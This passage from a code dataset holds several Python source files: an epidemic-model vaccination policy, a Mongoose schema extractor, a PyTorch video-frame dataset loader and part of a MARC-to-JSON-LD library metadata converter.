).nonzero()[0]\n\n if len(ids_to_vaccinate) < num:\n logging.info(\"Not enough workers to vaccinate.\")\n num = len(ids_to_vaccinate)\n if num == 0:\n return\n selected_ids = np.random.choice(\n ids_to_vaccinate, size=num, replace=False)\n for index in selected_ids:\n who = self.workers_to_vaccinate[index]\n self.vaccinated[who] = 0\n for index in sorted(selected_ids, reverse=True):\n del self.workers_to_vaccinate[index]\n\n # # get all nodes that are S or Ss and were not vaccinated\n # target_nodes = np.logical_not(\n # self.model.node_detected\n # )\n # target_nodes = np.logical_and(\n # target_nodes[:,0],\n # self.vaccinated == False\n # )\n # print(target_nodes.shape)\n # pool = self.nodes[target_nodes]\n\n # # select X of them to be vaccinated\n # to_vaccinate = np.random.choice(pool, size=self.num_to_vaccinate, replace=False)\n # self.vaccinated[to_vaccinate] = True\n # self.model.asymptomatic_rate[to_vaccinate] = 0.9\n\n # # self.model.move_to_R(to_vaccinate)\n\n def to_df(self):\n index = range(0+self.model.start_day-1, self.model.t +\n self.model.start_day) # -1 + 1\n policy_name = type(self).__name__\n columns = {\n f\"moved_to_R\": self.stat_moved_to_R[:self.model.t+1],\n }\n columns[\"day\"] = np.floor(index).astype(int)\n df = pd.DataFrame(columns, index=index)\n df.index.rename('T', inplace=True)\n return df\n\n\nclass VaccinationToR(Vaccination):\n\n def process_vaccinated(self):\n # # update two weeks after first vaccination\n nodes_in_S = self.nodes[self.model.memberships[STATES.S, :, 0] == 1]\n\n selected = nodes_in_S[self.vaccinated[nodes_in_S] == 14]\n r = np.random.rand(len(selected))\n to_R = selected[r < self.first_shot_coef]\n\n self.target_for_R.fill(0)\n self.target_for_R[to_R] = True\n\n selected = nodes_in_S[self.vaccinated[nodes_in_S] == self.delay + 7]\n r = np.random.rand(len(selected))\n to_R = selected[r < (self.second_shot_coef - self.first_shot_coef)]\n self.target_for_R[to_R] = True\n\n self.stat_moved_to_R[self.model.t] = self.target_for_R.sum()\n self.model.move_target_nodes_to_R(self.target_for_R)\n self.days_in_E[self.target_for_R] = 0\n\n\nclass VaccinationToA(Vaccination):\n\n def update_asymptomatic_rates(self):\n # # update two weeks after first vaccination\n selected = self.nodes[self.vaccinated == 14]\n srate = 1 - 0.179\n self.model.asymptomatic_rate[selected] = 1 - \\\n srate*(1-self.first_shot_coef)\n\n selected = self.nodes[self.vaccinated == self.delay + 7]\n self.model.asymptomatic_rate[selected] = 1 - \\\n srate*(1-self.second_shot_coef)\n\n def process_vaccinated(self):\n self.update_asymptomatic_rates()\n\n\nclass VaccinationToSA(VaccinationToA):\n\n def process_vaccinated(self):\n self.move_to_S()\n self.update_asymptomatic_rates()\n","repo_name":"epicity-cz/model-m","sub_path":"src/policies/vaccination.py","file_name":"vaccination.py","file_ext":"py","file_size_in_byte":13000,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"}
+{"seq_id":"19188760813","text":"import json\nimport sqlite3\nfrom xmlrpc.client import Boolean\nimport esprima\nPATH = 'PATHTOSCHEMAFILE'\n\n\ndef give_schema_ast(node):\n if node.type == \"Program\":\n return give_schema_ast(node.body[0])\n\n elif node.type == \"ExpressionStatement\":\n return give_schema_ast(node.expression)\n\n elif node.type == \"NewExpression\":\n if node.callee.name == \"Schema\":\n return give_schema_ast(node.arguments[0])\n \n elif node.type == \"CallExpression\":\n if node.callee.property.name == \"Schema\":\n return node.arguments[0]\n\n else:\n return node\n\n\n\ndef visit_schema(node):\n if node.type == \"ObjectExpression\":\n return {name: value for name, value in [visit_schema(prop) for prop in node.properties]}\n \n elif node.type == \"Property\":\n return visit_schema(node.key), visit_schema(node.value)\n \n #leaf literal\n elif node.type == \"Literal\":\n return node.value\n\n elif node.type == \"MemberExpression\":\n return visit_schema(node.object) + \".\" + visit_schema(node.property)\n \n #leafidentifier\n elif node.type == \"Identifier\":\n return node.name\n \n #just before leaf, next el should always be leaf\n elif node.type == \"ArrayExpression\":\n return [visit_schema(el) for el in node.elements]\n \n #In case they define a schema inside the schema\n elif node.type == \"NewExpression\":\n return visit_schema(node.arguments[0])\n\n\ndef get_schema_dict(file_path, coordinates):\n \"\"\"\n Returns the dict corresponding to schema at the given location\n\n parameters:\n -----------\n file_path: path to the file (str)\n coordinates: [start_line, start_column, end_line, end_column]\n\n returns:\n --------\n schema_dict: schema corresponding to the dict at the given location\n \"\"\"\n start_line, start_column, end_line, end_column = coordinates\n schema = ''\n with open(file_path, 'r') as f:\n for i in range(end_line):\n if i >= start_line-1:\n line = f.readline()\n if i == start_line-1:\n line = line[start_column-1:]\n elif i == end_line-1:\n line = line[:end_column]\n schema += line\n \n else:\n f.readline()\n tree_out = esprima.parseScript(schema)\n schema_tree = give_schema_ast(tree_out)\n return visit_schema(schema_tree)\nacc = []\ndef gather_attribute_names(schema_dict):\n \"\"\"\n gather attribute names from a specific schema dict\n\n parameters:\n -----------\n schema_dict : dict holding a mongoose schema (dict)\n\n returns:\n ---------\n attributes : list holding all attribute names\n \"\"\"\n\n if type(schema_dict) == list:\n [gather_attribute_names(el) for el in schema_dict]\n elif type(schema_dict) == dict:\n for key in schema_dict:\n if not(key in['type', 'default', 'enum', 'ref', 'index', 'alias']):\n acc.append(key)\n gather_attribute_names(schema_dict[key])\n\n","repo_name":"anoauthor/SCAM_online_appendix_274","sub_path":"codeQL_queries/javascript/python_scripts/extract_mongoose_schema.py","file_name":"extract_mongoose_schema.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"1096143705","text":"import os\nimport PIL\nimport json\nimport numpy as np\nfrom PIL import Image\nfrom random import shuffle\nfrom src.utils import get_logger\n\nimport torch\nimport torchvision\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset\n\ndef random_crop(cur_img):\n width, height = cur_img.size\n if width % 2 == 1:\n width -= 1\n if height % 2 == 1:\n height -= 1\n # random crop\n if width == height:\n cur_img = np.array(cur_img).astype(np.float32)\n return np.expand_dims(cur_img, axis=0)\n elif width < height:\n diff = height - width\n move = np.random.choice(diff) - diff // 2\n left, right = 0, width\n top = (height - width) // 2 + move\n bottom = (height + width) // 2 + move\n else:\n diff = width - height\n move = np.random.choice(diff) - diff // 2\n top, bottom = 0, height\n left = (width - height) // 2 + move\n right = (width + height) // 2 + move\n\n cur_img = cur_img.crop((left, top, right, bottom))\n return cur_img\n\ndef center_crop(img):\n # center crop\n w, h = img.size\n minl = min(h, w)\n left = (w - minl) / 2\n right = (w + minl) / 2\n top = (h - minl) / 2\n bottom = (h + minl) / 2\n img = img.crop((left, top, right, bottom))\n return img\n\n\nclass VideoFramesDataset(Dataset):\n def __init__(self, datapath, idspath, img_size, num_frames):\n super().__init__()\n\n self.img_size = img_size\n self.json_path = idspath\n self.frame_path = datapath\n self.num_frames = num_frames\n\n self.video_ids = json.load(open(self.json_path, 'r'))\n self.transform = transforms.Compose([\n transforms.Resize((img_size, img_size),\n interpolation=PIL.Image.BILINEAR),\n transforms.ToTensor(),\n # transforms.Normalize(mean=[0.485, 0.456, 0.406],\n # std=[0.229, 0.224, 0.225])\n ])\n\n logger = get_logger()\n logger.info(f\"{len(self.video_ids)} videos from datapath {datapath}, \"\n f\"img_size: {img_size}, num_frames: {num_frames}\")\n\n\n def __len__(self):\n return len(self.video_ids)\n\n def skip_sample(self, ind):\n if ind >= self.__len__() - 1:\n return self.__getitem__(0)\n return self.__getitem__(ind + 1)\n\n def __getitem__(self, index):\n video_id = self.video_ids[index]\n\n # random select 4 continuous frames\n imgs = []\n cur_path = os.path.join(self.frame_path, video_id)\n files = sorted(os.listdir(cur_path))\n if len(files) == self.num_frames:\n start = 0\n else:\n start = np.random.choice(range(len(files) - self.num_frames))\n\n for file in files[start : start + self.num_frames]:\n img_path = os.path.join(cur_path, file)\n img = Image.open(img_path)\n img = random_crop(img)\n cur_img = self.transform(img).unsqueeze(0)\n imgs.append(cur_img)\n\n # concate\n ret_imgs = torch.cat(imgs, dim=0)\n return ret_imgs # [B,T,C,H,W]\n\n\n# if __name__ == \"__main__\":\n# ds = VideoFramesDataset(datapath='/home/zhongguokexueyuanzidonghuayanjiusuo/datasets/msrvtt/frames',\n# idspath='/home/zhongguokexueyuanzidonghuayanjiusuo/datasets/msrvtt/train_frames_ids.json',\n# lq_img_size=128, gt_img_size=256)\n# lq_imgs, gt_imgs = ds[0]\n# print(lq_imgs.shape)\n# print(gt_imgs.shape)\n","repo_name":"iva-mzsun/MOSO","sub_path":"MOSO-VQVAE/src/dataset/VideoFramesDataset.py","file_name":"VideoFramesDataset.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"38"}
+{"seq_id":"40951046428","text":"#!/usr/bin/python3\n\nimport argparse\nimport sys\nimport json\nimport pymarc\nimport traceback\n\nfrom pymarc.exceptions import RecordLengthInvalid, RecordLeaderInvalid, BaseAddressNotFound, BaseAddressInvalid, RecordDirectoryInvalid, NoFieldsFound\n\nfrom multiprocessing import Pool, Lock\n\n\nrolemapping = {\n \"abr\": \"KürzendeR\",\n \"acp\": \"HerstellerIn von Nachbildungen\",\n \"act\": \"SchauspielerIn\",\n \"adi\": \"Art Director\",\n \"adp\": \"BearbeiterIn\",\n \"aft\": \"VerfasserIn eines Nachworts\",\n \"anl\": \"AnalytikerIn\",\n \"anm\": \"TrickfilmzeichnerIn\",\n \"ann\": \"KommentatorIn\",\n \"ant\": \"BibliographischeR VorgängerIn\",\n \"ape\": \"BerufungsbeklagteR/RevisionsbeklagteR\",\n \"apl\": \"BerufungsklägerIn/RevisionsklägerIn\",\n \"app\": \"AntragstellerIn\",\n \"aqt\": \"AutorIn von Zitaten oder Textabschnitten\",\n \"arc\": \"ArchitektIn\",\n \"ard\": \"künstlerische Leitung\",\n \"arr\": \"ArrangeurIn\",\n \"art\": \"KünstlerIn\",\n \"asg\": \"RechtsnachfolgerIn\",\n \"asn\": \"zugehöriger Name\",\n \"ato\": \"AutographIn\",\n \"att\": \"zugehöriger Name\",\n \"auc\": \"AuktionatorIn\",\n \"aud\": \"AutorIn des Dialogs\",\n \"aui\": \"VerfasserIn eines Geleitwortes\",\n \"aus\": \"DrehbuchautorIn\",\n \"aut\": \"VerfasserIn\",\n \"bdd\": \"BindungsgestalterIn\",\n \"bjd\": \"EinbandgestalterIn\",\n \"bkd\": \"BuchgestalterIn\",\n \"bkp\": \"BuchherstellerIn\",\n \"blw\": \"AutorIn des Klappentextes\",\n \"bnd\": \"BuchbinderIn\",\n \"bpd\": \"GestalterIn des Exlibris\",\n \"brd\": \"Sender\",\n \"brl\": \"BrailleschriftprägerIn\",\n \"bsl\": \"BuchhändlerIn\",\n \"cas\": \"FormgießerIn\",\n \"ccp\": \"konzeptionelle Leitung\",\n \"chr\": \"ChoreografIn\",\n \"clb\": \"MitarbeiterIn\",\n \"cli\": \"KlientIn, AuftraggeberIn\",\n \"cll\": \"KalligrafIn\",\n \"clr\": \"KoloristIn\",\n \"clt\": \"LichtdruckerIn\",\n \"cmm\": \"KommentatorIn\",\n \"cmp\": \"KomponistIn\",\n \"cmt\": \"SchriftsetzerIn\",\n \"cnd\": \"DirigentIn\",\n \"cng\": \"Kameramann/frau\",\n \"cns\": \"ZensorIn\",\n \"coe\": \"BerufungsbeklagteR im streitigen Verfahren\",\n \"col\": \"SammlerIn\",\n \"com\": \"ZusammenstellendeR\",\n \"con\": \"KonservatorIn\",\n \"cor\": \"SammlungskuratorIn\",\n \"cos\": \"AnfechtendeR, bestreitende Partei\",\n \"cot\": \"BerufungsklägerIn im streitigen Verfahren\",\n \"cou\": \"zuständiges Gericht\",\n \"cov\": \"UmschlaggestalterIn\",\n \"cpc\": \"BeansprucherIn des Urheberrechts\",\n \"cpe\": \"BeschwerdeführerIn-BerufungsbeklagteR\",\n \"cph\": \"InhaberIn des Urheberrechts\",\n \"cpl\": \"BeschwerdeführerIn/KlägerIn\",\n \"cpt\": \"KlägerIn/BerufungsklägerIn\",\n \"cre\": \"GeistigeR SchöpferIn\",\n \"crp\": \"KorrespondentIn\",\n \"crr\": \"KorrektorIn\",\n \"crt\": \"GerichtsstenografIn\",\n \"csl\": \"BeraterIn\",\n \"csp\": \"ProjektberaterIn\",\n \"cst\": \"KostümbildnerIn\",\n \"ctb\": \"MitwirkendeR\",\n \"cte\": \"AnfechtungsgegnerIn-BerufungsbeklagteR\",\n \"ctg\": \"KartografIn\",\n \"ctr\": \"VertragspartnerIn\",\n \"cts\": \"AnfechtungsgegnerIn\",\n \"ctt\": \"AnfechtungsgegnerIn-BerufungsklägerIn\",\n \"cur\": \"KuratorIn\",\n \"cwt\": \"KommentatorIn\",\n \"dbp\": \"Erscheinungsort\",\n \"dfd\": \"AngeklagteR/BeklagteR\",\n \"dfe\": \"AngeklagteR/BeklagteR-BerufungsbeklagteR\",\n \"dft\": \"AngeklagteR/BeklagteR-BerufungsklägerIn\",\n \"dgg\": \"Grad-verleihende Institution\",\n \"dgs\": \"AkademischeR BetreuerIn\",\n \"dir\": \"Dirigent\",\n \"dis\": \"PromovierendeR\",\n \"dln\": \"VorzeichnerIn\",\n \"dnc\": \"TänzerIn\",\n \"dnr\": \"GeldgeberIn\",\n \"dpc\": \"AbgebildeteR\",\n \"dpt\": \"AnlegerIn\",\n \"drm\": \"TechnischeR ZeichnerIn\",\n \"drt\": \"RegisseurIn\",\n \"dsr\": \"DesignerIn\",\n \"dst\": \"Vertrieb\",\n \"dtc\": \"BereitstellerIn von Daten\",\n \"dte\": \"WidmungsempfängerIn\",\n \"dtm\": \"DatenmanagerIn\",\n \"dto\": \"WidmendeR\",\n \"dub\": \"angeblicheR AutorIn\",\n \"edc\": \"BearbeiterIn der Zusammenstellung\",\n \"edm\": \"CutterIn\",\n \"edt\": \"HerausgeberIn\",\n \"egr\": \"StecherIn\",\n \"elg\": \"ElektrikerIn\",\n \"elt\": \"GalvanisiererIn\",\n \"eng\": \"IngenieurIn\",\n \"enj\": \"Normerlassende Gebietskörperschaft\",\n \"etr\": \"RadiererIn\",\n \"evp\": \"Veranstaltungsort\",\n \"exp\": \"ExperteIn\",\n \"fac\": \"FacsimilistIn\",\n \"fds\": \"Filmvertrieb\",\n \"fld\": \"BereichsleiterIn\",\n \"flm\": \"BearbeiterIn des Films\",\n \"fmd\": \"FilmregisseurIn\",\n \"fmk\": \"FilmemacherIn\",\n \"fmo\": \"frühereR BesitzerIn\",\n \"fmp\": \"FilmproduzentIn\",\n \"fnd\": \"GründerIn\",\n \"fpy\": \"Erste Partei\",\n \"frg\": \"FälscherIn\",\n \"gis\": \"GeographIn\",\n \"grt\": \"GraphischeR TechnikerIn\",\n \"hg\": \"Herausgeber\",\n \"his\": \"Gastgebende Institution\",\n \"hnr\": \"GefeierteR\",\n \"hst\": \"GastgeberIn\",\n \"Ill\": \"Illustrator\",\n \"ill\": \"IllustratorIn\",\n \"ilu\": \"Illuminator, BuchmalerIn\",\n \"ins\": \"InserierendeR\",\n \"inv\": \"ErfinderIn\",\n \"isb\": \"Herausgebendes Organ\",\n \"itr\": \"InstrumentalmusikerIn\",\n \"ive\": \"InterviewteR\",\n \"ivr\": \"InterviewerIn\",\n \"jud\": \"RichterIn\",\n \"jug\": \"zuständige Gerichtsbarkeit\",\n \"kad\": \"Kadenzverfasser\",\n \"lbr\": \"Labor\",\n \"lbt\": \"LibrettistIn\",\n \"ldr\": \"Laborleitung\",\n \"led\": \"Führung\",\n \"lee\": \"Libelee-appellee\",\n \"lel\": \"BeklagteR im Seerecht/Kirchenrecht\",\n \"len\": \"LeihgeberIn\",\n \"let\": \"Libelee-appellant\",\n \"lgd\": \"LichtgestalterIn\",\n \"lie\": \"Libelant-appellee\",\n \"lil\": \"KlägerIn im Seerecht/Kirchenrecht\",\n \"lit\": \"Libelant-appellant\",\n \"lsa\": \"LandschaftsarchitektIn\",\n \"lse\": \"LizenznehmerIn\",\n \"lso\": \"LizenzgeberIn\",\n \"ltg\": \"LithographIn\",\n \"lyr\": \"TextdichterIn\",\n \"mcp\": \"ArrangeurIn, Notenleser/-schreiberIn\",\n \"mdc\": \"Metadatenkontakt\",\n \"med\": \"Medium\",\n \"mfp\": \"Herstellungsort\",\n \"mfr\": \"HerstellerIn\",\n \"mod\": \"ModeratorIn\",\n \"mon\": \"BeobachterIn\",\n \"mrb\": \"MarmorarbeiterIn, MarmoriererIn\",\n \"mrk\": \"Markup-EditorIn\",\n \"msd\": \"MusikalischeR LeiterIn\",\n \"mte\": \"Metall-GraveurIn\",\n \"mtk\": \"ProtokollantIn\",\n \"mus\": \"MusikerIn\",\n \"nrt\": \"ErzählerIn\",\n \"opn\": \"GegnerIn\",\n \"org\": \"UrheberIn\",\n \"orm\": \"VeranstalterIn\",\n \"osp\": \"On-screen PräsentatorIn\",\n \"oth\": \"BerichterstatterIn\",\n \"own\": \"BesitzerIn\",\n \"pan\": \"DiskussionsteilnehmerIn\",\n \"pat\": \"SchirmherrIn\",\n \"pbd\": \"Verlagsleitung\",\n \"pbl\": \"Verlag\",\n \"pdr\": \"Projektleitung\",\n \"pfr\": \"Korrektur\",\n \"pht\": \"FotografIn\",\n \"plt\": \"DruckformherstellerIn\",\n \"pma\": \"Genehmigungsstelle\",\n \"pmn\": \"Produktionsleitung\",\n \"pop\": \"PlattendruckerIn\",\n \"ppm\": \"PapiermacherIn\",\n \"ppt\": \"PuppenspielerIn\",\n \"pra\": \"Praeses\",\n \"prc\": \"Prozesskontakt\",\n \"prd\": \"Produktionspersonal\",\n \"pre\": \"PräsentatorIn\",\n \"prf\": \"AusführendeR\",\n \"prg\": \"ProgrammiererIn\",\n \"prm\": \"DruckgrafikerIn\",\n \"prn\": \"Produktionsfirma\",\n \"pro\": \"ProduzentIn\",\n \"prp\": \"Produktionsort\",\n \"prs\": \"SzenenbildnerIn\",\n \"prt\": \"DruckerIn\",\n \"prv\": \"AnbieterIn\",\n \"pta\": \"PatentanwärterIn\",\n \"pte\": \"KlägerIn-BerufungsbeklagteR\",\n \"ptf\": \"ZivilklägerIn\",\n \"pth\": \"PatentinhaberIn\",\n \"ptt\": \"KlägerIn-BerufungsklägerIn\",\n \"pup\": \"Veröffentlichungsort\",\n \"rbr\": \"RubrikatorIn\",\n \"rcd\": \"TonmeisterIn\",\n \"rce\": \"ToningenieurIn\",\n \"rcp\": \"AdressatIn\",\n \"rdd\": \"HörfunkregisseurIn\",\n \"Red\": \"Redakteur\",\n \"red\": \"RedakteurIn\",\n \"ren\": \"RendererIn (Bildverarbeitung)\",\n \"res\": \"ForscherIn\",\n \"rev\": \"RezensentIn, GutachterIn\",\n \"rpc\": \"HörfunkproduzentIn\",\n \"rps\": \"Aufbewahrungsort, TreuhänderIn\",\n \"rpt\": \"ReporterIn\",\n \"rpy\": \"Verantwortliche Partei\",\n \"rse\": \"AntragsgegnerIn-BerufungsbeklagteR\",\n \"rsg\": \"RegisseurIn der Wiederaufführung\",\n \"rsp\": \"RespondentIn\",\n \"rsr\": \"RestauratorIn\",\n \"rst\": \"AntragsgegnerIn-BerufungsklägerIn\",\n \"rth\": \"Leitung des Forschungsteams\",\n \"rtm\": \"Mitglied des Forschungsteams\",\n \"sad\": \"WissenschaftlicheR BeraterIn\",\n \"sce\": \"DrehbuchautorIn\",\n \"scl\": \"BildhauerIn\",\n \"scr\": \"SchreiberIn\",\n \"sds\": \"Tongestalter\",\n \"sec\": \"SekretärIn\",\n \"sgd\": \"BühnenregisseurIn\",\n \"sgn\": \"UnterzeichnerIn\",\n \"sht\": \"Unterstützender Veranstalter\",\n \"sll\": \"VerkäuferIn\",\n \"sng\": \"SängerIn\",\n \"spk\": \"RednerIn\",\n \"spn\": \"SponsorIn\",\n \"spy\": \"Zweite Partei\",\n \"srv\": \"LandvermesserIn\",\n \"std\": \"BühnenbildnerIn\",\n \"stg\": \"Kulisse\",\n \"stl\": \"GeschichtenerzählerIn\",\n \"stm\": \"InszenatorIn\",\n \"stn\": \"Normungsorganisation\",\n \"str\": \"StereotypeurIn\",\n \"tcd\": \"Technische Leitung\",\n \"tch\": \"LehrerIn\",\n \"ths\": \"BetreuerIn (Doktorarbeit)\",\n \"tld\": \"FernsehregisseurIn\",\n \"tlp\": \"FernsehproduzentIn\",\n \"trc\": \"TranskribiererIn\",\n \"trl\": \"ÜbersetzerIn\",\n \"tyd\": \"Schrift-DesignerIn\",\n \"tyg\": \"SchriftsetzerIn\",\n \"uvp\": \"Hochschulort\",\n \"vac\": \"SynchronsprecherIn\",\n \"vdg\": \"BildregisseurIn\",\n \"voc\": \"VokalistIn\",\n \"wac\": \"KommentarverfasserIn\",\n \"wal\": \"VerfasserIn von zusätzlichen Lyrics\",\n \"wam\": \"AutorIn des Begleitmaterials\",\n \"wat\": \"VerfasserIn von Zusatztexten\",\n \"wdc\": \"HolzschneiderIn\",\n \"wde\": \"HolzschnitzerIn\",\n \"win\": \"VerfasserIn einer Einleitung\",\n \"wit\": \"ZeugeIn\",\n \"wpr\": \"VerfasserIn eines Vorworts\",\n \"wst\": \"VerfasserIn von ergänzendem Text\"\n}\n\nbaseuri = \"http://data.finc.info/resources/\"\n\n\nprop2isil = {\"swb_id_str\": \"(DE-576)\",\n \"kxp_id_str\": \"(DE-627)\"\n }\n\n\ndef fixRecord(record=\"\", record_id=0, validation=False, replaceMethod='decimal'):\n replaceMethods = {\n 'decimal': (('#29;', '#30;', '#31;'), (\"\\x1D\", \"\\x1E\", \"\\x1F\")),\n 'unicode': (('\\u001d', '\\u001e', '\\u001f'), (\"\\x1D\", \"\\x1E\", \"\\x1F\")),\n 'hex': (('\\x1D', '\\x1E', '\\x1F'), (\"\\x1D\", \"\\x1E\", \"\\x1F\"))\n }\n marcFullRecordFixed=record\n for i in range(0, 3):\n marcFullRecordFixed=marcFullRecordFixed.replace(replaceMethods.get(replaceMethod)[0][i], replaceMethods.get(replaceMethod)[1][i])\n if validation:\n try:\n reader = pymarc.MARCReader(marcFullRecordFixed.encode('utf8'), utf8_handling='replace')\n marcrecord = next(reader)\n except (RecordLengthInvalid, RecordLeaderInvalid, BaseAddressNotFound, BaseAddressInvalid, RecordDirectoryInvalid, NoFieldsFound, UnicodeDecodeError) as e:\n eprint(\"record id {0}:\".format(record_id)+str(e))\n with open('invalid_records.txt', 'a') as error:\n eprint(marcFullRecordFixed,file=error)\n return None\n return marcFullRecordFixed\n\n\ndef ArrayOrSingleValue(array):\n '''\n return an array\n if there is only a single value, only return that single value\n '''\n if isinstance(array, (int, float)):\n return array\n if array:\n length = len(array)\n if length > 1 or isinstance(array, dict):\n return array\n elif length == 1:\n for elem in array:\n return elem\n elif length == 0:\n return None\n\n\ndef eprint(*args, **kwargs):\n '''\n print to stderr\n '''\n print(*args, file=sys.stderr, **kwargs)\n\n\ndef getIDs(record, prop):\n if isinstance(prop, str):\n if prop in prop2isil and prop in record:\n return str(prop2isil[prop]+record[prop])\n elif prop in record and not prop in prop2isil:\n return str(record[prop])\n elif isinstance(prop, list):\n ret = []\n for elem in prop:\n if elem in prop2isil and elem in record:\n ret.append(str(prop2isil[elem]+record[elem]))\n elif elem in record and not elem in prop2isil:\n ret.append(record[elem])\n if ret:\n return ret\n\n\ndef getoAC(record, prop):\n if isinstance(record.get(prop), str):\n if record.get(prop) == \"Free\":\n return \"Yes\"\n elif isinstance(record.get(prop), list):\n for elem in record.get(prop):\n if elem == \"Free\":\n return \"Yes\"\n\n\ndef getAtID(record, prop):\n if record.get(prop):\n return baseuri+record[prop]\n\n\ndef getGND(record, prop):\n ret = []\n if isinstance(record.get(prop), str):\n return \"http://d-nb.info/gnd/\"+record.get(prop)\n elif isinstance(record.get(prop), list):\n for elem in record.get(prop):\n ret.append(\"http://d-nb.info/gnd/\"+elem)\n if ret:\n return ret\n else:\n return None\n\n\ndef getLanguage(record, prop):\n lang = getProperty(record, prop)\n if lang:\n language = {\"en\": lang}\n return language\n\n\ndef getTitle(record, prop):\n title = getProperty(record, prop)\n if title:\n if isinstance(title, str):\n if title[-2:] == \" /\":\n title = title[:-2]\n elif isinstance(title, list):\n for n, elem in enumerate(title):\n if elem[-2:] == \" /\":\n title[n] = title[n][:-2]\n return title\n\n\ndef getformat(record, prop, formattable):\n if isinstance(record.get(prop), str) and record.get(prop) in formattable:\n return formattable.get(record.get(prop))\n elif isinstance(record.get(prop), list):\n for elem in record.get(prop):\n if elem in formattable:\n return formattable.get(elem)\n\n\ndef getFormatRdfType(record, prop):\n formatmapping = {\"Article, E-Article\": \"bibo:Article\",\n \"Book, E-Book\": \"bibo:Book\",\n \"Journal, E-Journal\": \"bibo:Periodical\",\n \"Manuscript\": \"bibo:Manuscript\",\n \"Map\": \"bibo:Map\",\n \"Thesis\": \"bibo:Thesis\",\n \"Video\": \"bibo:AudioVisualDocument\"\n }\n value = getformat(record, prop, formatmapping)\n if value:\n return {\"@id\": value}\n else:\n return {\"@id\": \"bibo:Document\"}\n\n\ndef getFormatDctMedium(record, prop):\n formatmapping = {\"Audio\": \"rdamt:1001\",\n \"Microform\": \"rdamt:1002\",\n \"Notated Music\": \"rdau:P60488\"\n }\n value = getformat(record, prop, formatmapping)\n return value if value else None\n\n\ndef getOfferedBy(record, prop):\n if record.get(prop):\n return {\n \"@type\": \"http://schema.org/Offer\",\n \"schema:offeredBy\": {\n \"@id\": \"https://data.finc.info/organisation/DE-15\",\n \"@type\": \"schema:Library\",\n \"schema:name\": \"Univeristätsbibliothek Leipzig\",\n \"schema:branchCode\": \"DE-15\"\n },\n \"schema:availability\": \"http://data.ub.uni-leipzig.de/item/wachtl/DE-15:ppn:\"+record[prop]\n }\n\n\ndef getProperty(record, prop):\n ret = []\n if isinstance(prop, str):\n if prop in record:\n return record.get(prop)\n elif isinstance(prop, list):\n for elem in prop:\n if isinstance(record.get(elem), str):\n ret.append(record[elem])\n elif isinstance(record.get(elem), list):\n for elen in record[elem]:\n ret.append(elen)\n if ret:\n return ret\n else:\n return None\n\n\ndef getIsPartOf(record, prop):\n data = getProperty(record, prop)\n if isinstance(data, str):\n return {\"@id\": \"https://data.finc.info/resources/\"+data}\n elif isinstance(data, list):\n ret = []\n for elem in data:\n ret.append({\"@id\": \"https://data.finc.info/resources/\"+elem})\n return ret\n\n\ndef getIssued(record, prop):\n data = getProperty(record, prop)\n if isinstance(data, str):\n return {context.get(\"dateTime\"): data}\n elif isinstance(data, list):\n ret = []\n for elem in data:\n ret.append({\"@type\": \"xsd:gYear\",\n \"@value\": elem})\n return ret\n\n\n\"\"\"...\n \"contribution\" : [ {\n \"type\" : [ \"Contribution\" ],\n \"agent\" : {\n \"id\" : \"http://d-nb.info/gnd/1049709292\",\n \"type\" : [ \"Person\" ],\n \"dateOfBirth\" : \"1974\",\n \"gndIdentifier\" : \"1049709292\",\n \"label\" : \"Nichols, Catherine\" \n },\n \"role\" : {\n \"id\" : \"http://id.loc.gov/vocabulary/relators/edt\",\n \"label\" : \"Herausgeber/in\" \n }\n }, {\n \"type\" : [ \"Contribution\" ],\n \"agent\" : {\n \"id\" : \"http://d-nb.info/gnd/130408026\",\n \"type\" : [ \"Person\" ],\n \"dateOfBirth\" : \"1951\",\n \"gndIdentifier\" : \"130408026\",\n \"label\" : \"Blume, Eugen\" \n },\n \"role\" : {\n \"id\" : \"http://id.loc.gov/vocabulary/relators/ctb\",\n \"label\" : \"Mitwirkende\" \n }\n }\n\"\"\"\n\n\ndef get_contributon(record, prop):\n fullrecord_fixed = fixRecord(record=getProperty(record, prop), record_id=record.get(\n \"record_id\"), validation=False, replaceMethod='decimal')\n reader = pymarc.MARCReader(fullrecord_fixed.encode('utf-8'))\n data = []\n fields = [\"100\", \"110\", \"111\", \"700\", \"710\", \"711\"]\n for record in reader:\n for field in fields:\n for f in record.get_fields(field):\n contributor = {\n \"@type\": [\"bf:Contribution\"],\n \"bf:agent\": {\n \"@id\": \"http://d-nb.info/gnd/\"\n },\n \"bf:role\": {\n \"@id\": \"http://id.loc.gov/vocabulary/relators/\",\n }\n }\n if f['a']:\n contributor[\"bf:agent\"][\"rdfs:ch_label\"] = f['a']\n if f['0'] and f['0'].startswith(\"(DE-588)\"):\n contributor[\"bf:agent\"][\"@id\"] += f['0'].split(\")\")[1]\n else:\n del contributor['bf:agent']['@id']\n if f['4'] and len(f['4']) <= 4:\n if f['4'][0] == '-':\n contributor['bf:role']['@id'] += f['4'][1:]\n if rolemapping.get(f['4'][1:]):\n contributor['bf:role']['rdfs:ch_label'] = rolemapping[f['4'][1:]]\n else:\n contributor['bf:role']['@id'] += f['4']\n if rolemapping.get(f['4']):\n contributor['bf:role']['rdfs:ch_label'] = rolemapping[f['4']]\n else:\n del contributor['bf:role']\n if field[1:] == \"00\":\n contributor['bf:agent']['@type'] = 'bf:Person'\n elif field[1:] == \"10\":\n contributor['bf:agent']['@type'] = 'bf:Organization'\n elif field[1:] == \"11\":\n contributor['bf:agent']['@type'] = 'bf:Meeting'\n if contributor['bf:agent'].get('rdfs:ch_label'):\n data.append(contributor)\n\n return data if data else None\n\n\ndef get_rvk(record, prop):\n if prop in record:\n for rvk in record[prop]:\n if rvk == \"No subject assigned\":\n continue\n elif isinstance(rvk, str):\n return str(\"https://rvk.uni-regensburg.de/regensburger-verbundklassifikation-online#notation/{}\".format(rvk))\n\n\ndef putContext(record):\n return context\n\n# mapping={ \"target_field\":\"someString\"},\n\n# \"target_field\":{function:\"source_field\"}}\n\n\ncontext = {\n \"xsd\": \"http://www.w3.org/2001/XMLSchema#\",\n \"bf\": \"http://id.loc.gov/ontologies/bibframe/\",\n \"dct\": \"http://purl.org/dc/terms/\",\n \"dc\": \"http://purl.org/dc/terms/\",\n \"bibo\": \"http://purl.org/ontology/bibo/\",\n \"rdau\": 